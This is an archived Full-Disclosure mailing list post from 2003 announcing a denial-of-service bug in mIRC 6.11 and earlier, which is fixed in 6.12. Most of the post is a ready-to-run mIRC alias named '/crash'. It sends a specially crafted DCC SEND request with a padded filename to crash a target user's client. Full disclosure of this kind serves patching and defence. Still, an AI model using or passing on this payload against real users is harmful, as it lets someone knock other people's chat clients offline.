lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <003401c39295$925da960$5746370a@nsp.co.nz>
From: venom at gen-x.co.nz (VeNoMouS)
Subject: Mirc Dos 6.11 and below

Pointless posting, but thought I would any way.

Vulnerable systems:
 * mIRC version 6.11 and prior

Immune systems:
 * mIRC version 6.12

It is possible to crash a mIRC client by sending a specially crafted DCC
request.

Exploit:
mIRC alias:
/crash { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+
$chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) }
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031015/cea20479/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ